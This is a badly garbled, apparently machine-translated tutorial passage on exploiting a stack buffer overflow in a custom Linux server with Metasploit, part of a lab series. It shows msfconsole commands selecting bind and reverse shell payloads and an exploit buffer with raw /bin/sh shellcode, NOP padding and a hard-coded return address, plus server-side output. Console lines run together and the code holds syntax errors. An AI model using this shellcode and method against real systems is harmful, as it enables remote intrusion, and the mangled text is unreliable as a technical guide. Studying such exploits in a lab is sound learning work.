Let's try using this script to attack first:
MSF > Use exploit/linux/myvictimmsf Exploit (myvictim)> Set Payload linux/x86/Set Payload Linux/X86/METSVC_BIND_TCP Set Payload linux/x86/shell_reverse_tcp2set Payload Linux/x86/metsvc_reverse_tcpmsf Exploit (myvictim)> Set Payload linux/x86/Metsvc_bind_tcppayload= linux/x86/metsvc_bind_tcpmsf Exploit (myvictim)> Set Rhost10.10.10.133Rhost=10.10.10.133MSF exploit (myvictim)> Set Rport7777Rport=7777MSF exploit (myvictim)>exploit[*] Started bind handler[*] Sending the bytepayload ... [*] Exploit completed, but no session is created.
Server Side display:
[email protected]:/mnt/hgfs/r/stack$./Serversocketbindlistenserver is run...acceptthe IP of the client is: 10.10. 10.128 The Port of client is: 52308 Close 2 recvacceptsp=0xbffff488, addr=0xbffff4a4 bytes.
Obviously the purpose of the attack is not achieved, the specific reason is two (I think), the first is the return value part of the wrong, the second is payload itself is not a problem
We revise:
' myvictimsever run on Linux ' , {'Platform'Linux',' Ret ' = = 0xbffff4a4}
Second, we payload first to use the first validated run/bin/sh shellcode
#Build the buffer for transmissionbuf=""; BUF = Make_nops ();buf+="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"buf+="\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"buf+="\x80\xe8\xdc\xff\xff\xff/bin/sh"; #buf+= "\XA4\XF4\XFF\XBF" #buf + = payload.encodedBUF + = [].fill (target.ret,0,100). Pack ('v*')
In particular, note that the number of NOP instructions We added last time is 15, and I've been stuck here for a long period, because of the alignment problem, obviously 32-bit platforms should be four-byte aligned.
And then run
MSF Exploit (myvictim) > rexploit[*] Reloading module ... [*] Started bind handler[-byte payload ... [*] Exploit completed, but no session is created.
Note that this is rexploit, which means reload the module and execute it because I just modified it.
You can see the server side:
The IP of client is:10.10. 10.128 The Port of client is: 47336 Close 2 acceptrecvsp=0xbffff488, addr=0xbffff4a4 bytes.$ $
Here the shellcode is generated by itself, not with payload.encoded, because I try to use payload, but no response, it should be the code can not be executed after the result.
Overflow attack using Metasploit stacks-5